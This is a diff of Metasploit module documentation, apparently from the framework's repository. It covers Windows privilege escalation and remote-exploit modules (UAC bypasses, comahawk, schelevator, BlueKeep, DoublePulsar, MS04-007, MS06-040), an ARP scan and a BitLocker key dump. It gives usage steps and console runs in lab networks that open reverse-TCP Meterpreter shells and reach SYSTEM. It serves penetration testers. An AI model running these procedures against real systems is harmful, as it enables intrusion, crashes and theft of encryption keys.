+   handler should be disabled: `set DisablePayloadHandler true`.
+5. Make sure that the `SESSION` value is set to the existing session identifier.
+6. Invoke the module: `run`.
+
+## Scenario
+
+### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64
+
+```
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] UAC is Enabled, checking level...
+[*] Checking admin status...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] win_dir = C:\Windows
+[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
+[*] exploit_dir = C:\Windows\System32\
+[*] target_filepath = C:\Windows\System32\gpedit.msc
+[*] Making Payload
+[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
+[*] UUID = a47dbe47-41a6-42ed-95a0-e2cc4710a75a
+[*] Writing  to HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32
+[*] Writing COR_PROFILER to HKCU\Environment
+[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
+[*] Writing COR_PROFILER_PATH to HKCU\Environment
+[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
+[*] Payload Upload Complete
+[*] Launching C:\Windows\System32\gpedit.msc
+[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll!
+[*] Please wait for session and cleanup....
+[*] Sending stage (206403 bytes) to 192.168.132.187
+[*] Meterpreter session 5 opened (192.168.135.168:4444 -> 192.168.132.187:49234) at 2019-11-15 12:14:41 -0600
+[*] Removing Registry Changes
+[*] Deleting HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32 key
+[*] Deleting COR_PROFILER from HKCU\Environment key
+[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
+[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
+[*] Registry Changes Removed
+
+meterpreter > sysinfo
+Computer        : WIN7X64-SP1
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: WIN7X64-SP1\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+
+```
+
+### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64
+```
+msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_dotnet_profiler 
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > set session 6
+session => 6
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > show options
+
+Module options (exploit/windows/local/bypassuac_dotnet_profiler):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
+   SESSION       6                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] UAC is Enabled, checking level...
+[*] Checking admin status...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] win_dir = C:\Windows
+[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
+[*] exploit_dir = C:\Windows\System32\
+[*] target_filepath = C:\Windows\System32\gpedit.msc
+[*] Making Payload
+[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
+[*] UUID = d472ba96-3dfc-432c-8ad2-f44ada2a39ec
+[*] Writing COR_PROFILER to HKCU\Environment
+[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
+[*] Writing COR_PROFILER_PATH to HKCU\Environment
+[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
+[*] Payload Upload Complete
+[*] Launching C:\Windows\System32\gpedit.msc
+[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll!
+[*] Please wait for session and cleanup....
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 7 opened (192.168.135.168:4444 -> 192.168.132.125:49683) at 2019-11-15 12:18:54 -0600
+[*] Removing Registry Changes
+[*] Deleting COR_PROFILER from HKCU\Environment key
+[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
+[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
+[*] Registry Changes Removed
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+
+```
@@ -0,0 +1,87 @@
+## Introduction
+
+This module exploits an autoelevate feature in the windows backup
+system's sdclt.exe binary to run as a higher integrity process.
+
+## Usage
+
+1. Create a session on the target system under the context of a local administrative user.
+2. Begin interacting with the module: `use exploit/windows/local/bypassuac_sdclt`.
+3. Set the `PAYLOAD` and configure it correctly.
+4. If an existing handler is configured to receive the elevated session, then the module's
+   handler should be disabled: `set DisablePayloadHandler true`.
+5. Make sure that the `SESSION` value is set to the existing session identifier.
+6. Invoke the module: `run`.
+
+## Scenario
+
+### Windows 10.0.17134 x64
+
+```
+msf5 exploit(windows/local/bypassuac_sdclt) > show options
+
+Module options (exploit/windows/local/bypassuac_sdclt):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
+   SESSION       1                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+msf5 exploit(windows/local/bypassuac_sdclt) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] UAC is Enabled, checking level...
+[*] Checking admin status...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] win_dir = C:\Windows
+[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
+[*] exploit_dir = C:\Windows\System32\
+[*] exploit_file = C:\Windows\System32\sdclt.exe
+[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
+[*] Making Payload
+[*] reg_command = C:\Windows\System32\cmd.exe /c start C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
+[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
+[*] Payload Upload Complete
+[*] Launching C:\Windows\System32\sdclt.exe
+[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe!
+[*] Please wait for session and cleanup....
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49679) at 2019-10-25 14:55:08 -0500
+[*] Removing Registry Changes
+[*] Registry Changes Removed
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+```
@@ -0,0 +1,110 @@
+## Introduction
+
+This leverages two vulnerabilities on specific builds of Windows 10 to
+move from an authenticated user of any level to NT AUTHORITY\LOCAL SERVICE
+and then from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
+The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
+NT AUTHORITY\LOCAL SERVICE
+The second (CVE-2019-1322) leverages the Update Orchestrator Service to
+elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
+
+The exploit works by creating a new service, so the exploit may take
+up to minute on test systems, and may take longer in the wild.  Adjusting
+the exploit_timeout value in the datastore.
+
+## Usage
+
+1. Create a session on the target system under the context of an authenticated user.
+2. Begin interacting with the module: `use exploit/windows/local/comahawk`.
+3. Set the `PAYLOAD` and configure it correctly.
+4. If an existing handler is configured to receive the elevated session, then the module's
+   handler should be disabled: `set DisablePayloadHandler true`.
+5. Make sure that the `SESSION` value is set to the existing session identifier.
+6. Invoke the module: `run`.
+
+## Scenario
+
+### Windows 10 (10.0 Build 17134) x64
+
+```
+[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.132.125:49674) at 2019-12-11 18:33:09 -0600
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+meterpreter > getsystem
+[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
+[-] Named Pipe Impersonation (In Memory/Admin)
+[-] Named Pipe Impersonation (Dropper/Admin)
+[-] Token Duplication (In Memory/Admin)
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(multi/handler) > use exploit/windows/local/comahawk 
+msf5 exploit(windows/local/comahawk) > set versbose true
+versbose => true
+msf5 exploit(windows/local/comahawk) > set session 1
+session => 1
+msf5 exploit(windows/local/comahawk) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/local/comahawk) > set lhost 192.168.135.168
+lhost => 192.168.135.168
+msf5 exploit(windows/local/comahawk) > show options
+
+Module options (exploit/windows/local/comahawk):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   EXECUTE_DELAY    3                yes       The number of seconds to delay between file upload and exploit launch
+   EXPLOIT_NAME                      no        The filename to use for the exploit binary (%RAND% by default).
+   EXPLOIT_TIMEOUT  60               yes       The number of seconds to wait for exploit to finish running
+   PAYLOAD_NAME                      no        The filename for the payload to be used on the target host (%RAND%.exe by default).
+   SESSION          1                yes       The session to run this module on.
+   WRITABLE_DIR                      no        Path to write binaries (%TEMP% by default).
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+msf5 exploit(windows/local/comahawk) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 1
+[*] Exploit uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\TcpHnwmv.exe
+[*] Payload (7168 bytes) uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\EubQLoJJbPMX.exe
+[*] It may take a moment after the session is established for the exploit to exit safely.
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49679) at 2019-12-11 18:35:35 -0600
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+
+```
@@ -0,0 +1,51 @@
+## Vulnerable Application
+
+This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
+
+## Scenarios
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
+3. Do: `set SESSION [#]`
+4. Do: `run`
+
+### A run on Windows Vista (Build 6000) and Kali Linux 2019.3
+
+  ```
+  msf > use modules/exploits/windows/local/ms10_092_schelevator
+  msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1
+    SESSION => 1
+  msf5 exploit(windows/local/ms10_092_schelevator) > run  
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] Preparing payload at C:\Users\test\AppData\Local\Temp\CItOOtB.exe
+    [*] Creating task: TzAZ6H4K
+    [*] SUCCESS: The scheduled task "TzAZ6H4K" has successfully been created.
+    [*] SCHELEVATOR
+    [*] Reading the task file contents from C:\Windows\system32\tasks\TzAZ6H4K...
+    [*] Original CRC32: 0x69b1db25
+    [*] Final CRC32: 0x69b1db25
+    [*] Writing our modified content back...
+    [*] Validating task: TzAZ6H4K
+    [*]
+    [*] Folder: \
+    [*] TaskName                                   Next Run Time        Status
+    [*] ========================================== ==================== ===============
+    [*] TzAZ6H4K                                   12/1/2019 10:41:00 A Ready
+    [*] SCHELEVATOR
+    [*] Disabling the task...
+    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
+    [*] SCHELEVATOR
+    [*] Enabling the task...
+    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
+    [*] SCHELEVATOR
+    [*] Executing the task...
+    [*] Sending stage (180291 bytes) to 192.168.1.2
+    [*] SUCCESS: Attempted to run the scheduled task "TzAZ6H4K".
+    [*] SCHELEVATOR
+    [*] Deleting the task...
+    [*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.2:49249) at 2019-11-27 10:42:02 -0700
+    [*] SUCCESS: The scheduled task "TzAZ6H4K" was successfully deleted.
+    [*] SCHELEVATOR
+  ```
@@ -1,22 +1,31 @@
 CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free

-The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free.  With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.
+The RDP `termdd.sys` driver improperly handles binds to internal-only channel `MS_T120`,
+allowing a malformed `Disconnect Provider Indication` message to cause use-after-free.
+With a controllable data/size remote nonpaged pool spray, an indirect call gadget of
+the freed channel is used to achieve arbitrary code execution.
+
+**Windows 7 SP1** and **Windows Server 2008 R2** are the **only** currently supported targets.
+
+Windows 7 SP1 should be exploitable in its default configuration, assuming your target
+selection is correctly matched to the system's memory layout.
+
+`HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam`
+**needs** to be set to `0` for exploitation to succeed against **Windows Server 2008 R2**.
+This is a **non-standard** configuration for normal servers, and the target **will crash** if
+the aforementioned Registry key is not set!
+
+If the target is crashing regardless, you will likely need to determine the non-paged
+pool base in kernel memory and set it as the `GROOMBASE` option.

 ## Vulnerable Application

-This exploit should work against a vulnerable RDP service from one of these Windows systems:
-
-* Windows 2000 x86 (All Service Packs))
-* Windows XP x86 (All Service Packs))
-* Windows 2003 x86 (All Service Packs))
-* Windows 7 x86 (All Service Packs))
-* Windows 7 x64 (All Service Packs)
-* Windows 2008 R2 x64 (All Service Packs)
-
 This exploit module currently targets these Windows systems running on several virtualized and physical targets.

-* Windows 7 x64 (All Service Packs)
-* Windows 2008 R2 x64 (All Service Packs)
+* Windows 7 SP1 x64
+* Windows 2008 R2 x64
+
+XP and 2003 are currently not supported. Please see available targets by running the `show targets` command.

 ## Verification Steps

@@ -37,7 +37,7 @@ msf5 exploit(windows/smb/doublepulsar_rce) > check
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
 [*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
 [*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
-[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
+[!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
 [+] 192.168.56.115:445 - The target is vulnerable.
 msf5 exploit(windows/smb/doublepulsar_rce) >
 ```
@@ -53,7 +53,7 @@ msf5 exploit(windows/smb/doublepulsar_rce) > run
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
 [*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
 [*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
-[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
+[!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
 [*] 192.168.56.115:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
 [*] 192.168.56.115:445 - Total shellcode length: 4096 bytes
 [*] 192.168.56.115:445 - Encrypting shellcode with XOR key 0x33C6DC64
@@ -86,7 +86,7 @@ msf5 exploit(windows/smb/doublepulsar_rce) > run
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
 [*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
 [*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
-[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
+[!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
 [*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
 [+] 192.168.56.115:445 - Implant neutralization successful
 [*] Exploit completed, but no session was created.
@@ -0,0 +1,75 @@
+## Vulnerable Application
+
+This is a general-purpose module for exploiting systems with Windows Group Policy configured to load VBS startup/logon scripts from remote locations.
+This module runs a SMB shared resource that will provide a payload through a VBS file. Startup scripts will be executed with SYSTEM privileges,
+while logon scripts will be executed with the user privileges. The attacker still needs to redirect the target traffic to the fake SMB
+share to exploit it successfully.
+
+Please note in some cases, it will take 5 to 10 minutes to receive a session.
+
+More information available at [Gotham Digital Science Security](https://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use modules/exploits/windows/smb/group_policy_startup```
+  3. Do: ```exploit```
+
+## Options
+
+  **FILE_NAME**
+
+  VBS File name to share (Default: random .vbs)
+
+  **FOLDER_NAME**
+
+  Folder name to share (Default: none)
+
+  **SHARE**
+
+  Share name (Default: Random)
+
+
+## Scenarios
+
+### Domain Group Policy
+
+In this scenario, the following computers are present:
+
+1. Windows 7 (x64, Build 7601, SP1): Victim
+2. Server 2016 (x64, Version 1607, OS Build 14393.970): Domain Controller
+
+The module sets up the SMB share and VBScript file. Out of band (outside the scope of this module or docs) a Group Policy is simply applied to the `OU` computer container.
+Next, the Win 7 box grabs the payload, in this case the meterpreter reverse_tcp stager on boot, with `SYSTEM` privs because its executed as a start up script.
+Theoretically, any computer in that `OU` would also execute the script on started up. 
+
+  ```
+  msf > use modules/exploits/windows/smb/group_policy_startup
+  msf exploit(windows/smb/group_policy_startup) > set FILE_NAME startup.vbs
+    FILE_NAME => startup.vbs
+  msf exploit(windows/smb/group_policy_startup) > set SHARE scripts
+    SHARE => scripts
+  msf exploit(windows/smb/group_policy_startup) > exploit
+    [*] Exploit running as background job 0.
+    [*] Exploit completed, but no session was created.
+
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] File available on \\192.168.1.3\scripts\startup.vbs...
+    [*] Started service listener on 192.168.1.3:445
+    [*] Server started.
+    [*] Sending stage (180291 bytes) to 192.168.1.4
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:49178) at 2019-12-04 13:12:05 -0700
+  msf exploit(windows/smb/group_policy_startup) > sessions 1
+    [*] Starting interaction with 1...
+
+  meterpreter > sysinfo
+    Computer        : MSF-PC
+    OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+    Architecture    : x64
+    System Language : en_US
+    Domain          : MSF
+    Logged On Users : 1
+    Meterpreter     : x86/windows
+  meterpreter > getuid
+    Server username: NT AUTHORITY\SYSTEM
+  ```
@@ -0,0 +1,59 @@
+## Vulnerable Application
+
+This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch.
+
+You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system.
+
+This exploit has been successfully tested with the windows/[all]/reverse_tcp payloads, however a few problems were encountered when using the equivalent bind payloads. Your mileage may vary.
+
+Service Pack 1, Roll Up 1 includes MS04-007.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/exploits/windows/smb/ms04_007_killbill`
+  3. Do: `set RHOSTS [IP]`
+  4. Do: `set LHOST [IP]`
+  5. Do: `set LPORT [port]`
+  6. Do: `run`
+
+## Error messages
+
+```
+The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
+```
+
+The system is vulnerable.
+
+```
+The server responded with error: STATUS_INVALID_PARAMETER (Command=115 WordCount=0)
+```
+
+The system is not vulnerable.
+
+## Scenarios
+
+### A run on Windows 2000 (Build 2195, SP4) and Kali Linux 2019.3
+
+  ```      
+  msf > use modules/exploits/windows/smb/ms04_007_killbill
+  msf exploit(windows/smb/ms04_007_killbill) > set RHOSTS 192.168.1.2
+    RHOSTS => 192.168.1.2
+  msf exploit(windows/smb/ms04_007_killbill) > run
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [-] 192.168.1.2:445 - Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
+    [*] Sending stage (180291 bytes) to 192.168.1.2
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:1050) at 2019-11-27 19:08:46 -0700
+
+  meterpreter > sysinfo
+    Computer        : PC-B43791F5F5
+    OS              : Windows 2000 (5.0 Build 2195).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 0
+    Meterpreter     : x86/windows
+
+  meterpreter > getuid
+    Server username: NT AUTHORITY\SYSTEM
+  ```
@@ -0,0 +1,46 @@
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all MB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/exploits/windows/smb/ms06_040_netapi`
+  3. Do: `set RHOSTS [IP]`
+  4. Do: `set PAYLOAD [payload]`
+  5. Do: `set LHOST [IP]`
+  6. Do: `set LPORT [port]`
+  7. Do: `run`
+
+## Scenarios
+
+### A run against Windows 2000 (Build 2195, SP4) and Kali Linux 2019.3
+
+  ```
+  msf exploit(windows/smb/ms06_040_netapi) > use modules/exploit/windows/smb/ms06_040_netapi
+  msf exploit(windows/smb/ms06_040_netapi) > set RHOSTS 192.168.1.2
+  msf exploit(windows/smb/ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
+  msf exploit(windows/smb/ms06_040_netapi) > exploit
+
+    [*] 192.168.1.2:445 - Detected a Windows 2000 target
+    [*] 192.168.1.2:445 - Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
+    [*] 192.168.1.2:445 - Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
+    [*] 192.168.1.2:445 - Building the stub data...
+    [*] 192.168.1.2:445 - Calling the vulnerable function...
+    [*] Started bind TCP handler against 192.168.1.2:4444
+    [*] Sending stage (180291 bytes) to 192.168.1.2
+    [*] Meterpreter session 1 opened (192.168.1.3:39603 -> 192.168.1.2:4444) at 2019-12-02 11:48:52 -0700
+
+
+  meterpreter > sysinfo
+    Computer        : PC-B43791F5F5
+    OS              : Windows 2000 (5.0 Build 2195).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 1
+    Meterpreter     : x86/windows
+
+  meterpreter > getuid
+    Server username: NT AUTHORITY\SYSTEM
+  ```
@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+This Module will perform an ARP scan for a given IP range through a Meterpreter Session.
+
+## Verification Steps
+  1. Start msfconsole
+  2. Get meterpreter session
+  3. Do: ```use post/windows/gather/arp_scanner```
+  4. Do: ```set SESSION <session id>```
+  5. Do: ```run```
+
+## Options
+
+  **RHOSTS**
+
+  The target address range or CIDR identifier.
+
+  **SESSION**
+
+  The session to run this module on.
+
+  **THREADS**
+
+  The number of concurrent threads.
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1).
+
+  ```
+  msf > use post/windows/gather/arp_scanner
+  msf post(windows/gather/arp_scanner) > set SESSION 1
+    SESSION => 1
+  msf post(windows/gather/arp_scanner) > ifconfig
+    [*] exec: ifconfig
+
+    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
+          inet 192.168.1.3  netmask 255.255.255.0  broadcast 192.168.1.255
+          inet6 fe80::44fe:c9ff:fe8e:1fad  prefixlen 64  scopeid 0x20<link>
+          ether 46:fe:c9:8e:1f:ad  txqueuelen 1000  (Ethernet)
+          RX packets 27893  bytes 2923998 (2.7 MiB)
+          RX errors 0  dropped 0  overruns 0  frame 0
+          TX packets 19615  bytes 6060131 (5.7 MiB)
+          TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
+
+    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
+          inet 127.0.0.1  netmask 255.0.0.0
+          loop  txqueuelen 1000  (Local Loopback)
+          RX packets 152642  bytes 40401455 (38.5 MiB)
+          RX errors 0  dropped 0  overruns 0  frame 0
+          TX packets 152642  bytes 40401455 (38.5 MiB)
+          TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
+
+  msf post(windows/gather/arp_scanner) > set THREADS 100
+    THREADS => 100
+  msf post(windows/gather/arp_scanner) > set RHOSTS 192.168.1.0/24
+    RHOSTS => 192.168.1.0/24
+  msf post(windows/gather/arp_scanner) > run
+
+    [*] Running module against MSF-PC
+    [*] ARP Scanning 192.168.1.0/24
+    [+]     IP: 192.168.1.1 MAC 2a:34:70:bc:5d:bc (UNKNOWN)
+    [+]     IP: 192.168.1.2 MAC f6:82:74:e7:58:25 (UNKNOWN)
+    [+]     IP: 192.168.1.3 MAC 46:fe:c9:8e:1f:ad (UNKNOWN)
+    [+]     IP: 192.168.1.4 MAC 96:56:23:ed:e1:bd (UNKNOWN)
+    [*] Post module execution completed
+  ```
@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+This module enumerates ways to decrypt a Bitlocker volume and if a recovery key is stored locally or can be generated, dump the Bitlocker master key (FVEK)
+
+## Verification Steps
+  1. Start msfconsole
+  2. Get meterpreter session
+  3. Do: ```use post/windows/gather/bitlocker_fvek```
+  4. Do: ```set SESSION <session id>```
+  5. Do: ```set DRIVE_LETTER <letter>```
+  6. Do: ```run```
+
+## Options
+
+  **DRIVE_LETTER**
+
+  Dump information from the DRIVE_LETTER encrypted with Bitlocker.
+
+  **RECOVERY_KEY**
+
+  Use the recovery key provided to decrypt the Bitlocker master key (FVEK).
+
+  **SESSION**
+
+  The session to run this module on.
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1).
+
+  ```
+  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.6:49184) at 2019-12-11 12:51:59 -0700
+
+  msf > use post/windows/gather/bitlocker_fvek
+  msf post(windows/gather/bitlocker_fvek) > set SESSION 1
+    SESSION => 1
+  msf post(windows/gather/bitlocker_fvek) > set DRIVE_LETTER c
+    DRIVE_LETTER => c
